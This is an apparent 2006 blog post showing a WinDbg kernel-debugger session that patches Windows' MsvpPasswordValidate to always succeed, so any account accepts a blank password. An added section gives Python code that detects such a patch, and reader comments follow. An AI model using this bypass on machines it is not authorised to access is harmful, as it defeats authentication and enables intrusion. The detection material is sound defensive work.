Bypassing your testbox's login password
Aug 10 2006, 16:21 (UTC+0)
bugcheck writes: After living out of a duffle bag for 2 months now I've finally got all my stuff back and have settled into a new apartment and finally have dev PCs again, W00h00! So this isn't the first time I have had to do this to recover an install with a forgotten password, but I figured I'd share it in case you are able to take advantage of it (thx to a friend for pointing out what function did the trick). As stupid as I am, I always pick those unique but easy to remember passwords that of course I'll never forget, use it once and shelf the image for months at a time and then, of course, forget it. In my case today it's my dev box!!! Luckily I had been using it as a test machine when I first got it, so I happened to already have a boot.ini entry to kernel debug on 1394 and of course had my laptop handy. I know there are better ways to recover a forgotten password, but of course they're not as cool as this! =P It doesn't reset it, but at least you can log in again...

Happy debugging,
Chris

kd> !process 0 0 winlogon.exe
PROCESS 817bb978 SessionId: 0 Cid: 0260 Peb: 7ffdc000 ParentCid: 0168
DirBase: 05e40060 ObjectTable: e148a858 HandleCount: 455.
Image: winlogon.exe

kd> .process /p /r 817bb978
Implicit process is now 817bb978
.cache forcedecodeuser done
Loading User Symbols
...................................................
kd> u msv1_0!MsvpPasswordValidate l3
msv1_0!MsvpPasswordValidate:
77c79927 ?? ???
^ Memory access error in 'u msv1_0!MsvpPasswordValidate l3'

kd> .pagein msv1_0!MsvpPasswordValidate
You need to continue execution (press 'g' <enter>) for the pagein to be brought in. When the debugger breaks in again, the page will be present.

kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
80526da8 cc int 3

kd> u msv1_0!MsvpPasswordValidate l3
msv1_0!MsvpPasswordValidate:
77c79927 8bff mov edi,edi
77c79929 55 push ebp
77c7992a 8bec mov ebp,esp

kd> eq msv1_0!MsvpPasswordValidate cccc000cc201b0

kd> u msv1_0!MsvpPasswordValidate l3
msv1_0!MsvpPasswordValidate:
77c79927 b001 mov al,0x1
77c79929 c20c00 ret 0xc
77c7992c cc int 3

kd> ** YOU CAN NOW LOGIN WITH A BLANK PASSWORD!
kd> ** DONT BE SCREWIN WITH YOUR CO-WORKERS NOW =p

kd> g
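What the session above actually does is overwrite the first bytes of msv1_0!MsvpPasswordValidate with a stub that ignores its arguments and returns TRUE. From the defender's side the interesting part is that this leaves a recognisable fingerprint: the standard hotpatchable prologue (mov edi,edi / push ebp / mov ebp,esp, bytes 8B FF 55 8B EC) is gone and a "return constant" sequence (B0 xx C2 xx xx) sits at the entry point instead. The following added example, not code from the post or from rootkit.com, decodes the quadword the `eq` command writes into the little-endian bytes that land in memory and classifies a function entry as intact, patched with a return-constant stub, or otherwise modified. The expected prologue bytes and the sample patched bytes are taken from the transcript; the function names are this example's own.

```python
"""Integrity check for a function entry point, plus a decoder for the
quadword that WinDbg's `eq` writes.

Added example, not code from the original post. Sample bytes are
constructed from the transcript above: the standard hotpatchable
prologue and the stub the post writes over MsvpPasswordValidate.
"""
import struct

# Standard x86 hotpatchable prologue: mov edi,edi / push ebp / mov ebp,esp
HOTPATCH_PROLOGUE = bytes.fromhex("8bff558bec")

# The quadword from the transcript's `eq` command (constructed sample input).
SAMPLE_EQ_VALUE = "cccc000cc201b0"


def eq_to_bytes(qword_hex: str) -> bytes:
    """Return the 8 bytes that `eq <addr> <value>` places in memory.

    x86 is little-endian, so the low byte of the value is written first:
    cccc000cc201b0 becomes b0 01 c2 0c 00 cc cc 00, i.e. mov al,1 /
    ret 0xc / int 3 / int 3 / (a trailing zero byte).
    """
    return struct.pack("<Q", int(qword_hex, 16))


def looks_like_return_constant_stub(code: bytes) -> bool:
    """True if the bytes start with `mov al, imm8` (B0 xx) followed by
    `ret imm16` (C2 xx xx): a function body that returns a fixed BOOLEAN
    and never looks at its arguments."""
    return len(code) >= 5 and code[0] == 0xB0 and code[2] == 0xC2


def prologue_status(entry_bytes: bytes, expected: bytes = HOTPATCH_PROLOGUE) -> str:
    """Classify the first bytes read from a function's entry point.

    In a real check `expected` would come from the on-disk image of the
    module (after relocation), and `entry_bytes` from live memory.
    """
    if entry_bytes[: len(expected)] == expected:
        return "intact"
    if looks_like_return_constant_stub(entry_bytes):
        imm = entry_bytes[1]
        # ret imm16 pops imm16 bytes of stack arguments; /4 gives dword args
        argc = struct.unpack_from("<H", entry_bytes, 3)[0] // 4
        return f"patched: returns {imm} and pops {argc} dword args"
    return "modified"


if __name__ == "__main__":
    patched = eq_to_bytes(SAMPLE_EQ_VALUE)
    print(patched.hex())                      # b001c20c00cccc00
    print(prologue_status(HOTPATCH_PROLOGUE))  # intact
    print(prologue_status(patched))            # patched: returns 1 and pops 3 dword args
```

The three-dword argument count recovered from `ret 0xc` matches the `l3` unassembly in the post: the stub pops exactly what the original __stdcall function would have, so the caller's stack stays balanced, which is why the patched function does not crash lsass. A production check would compare the whole function body against the on-disk module rather than just the prologue, since a patch can be placed anywhere in the routine.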


recent comments:
subject author date
possibility to erase it on-disk toto22 13.Aug:11:26
woohoo2 rossettoecioccolato 11.Aug:06:34
woohoo ! MohammadHosein 10.Aug:21:33
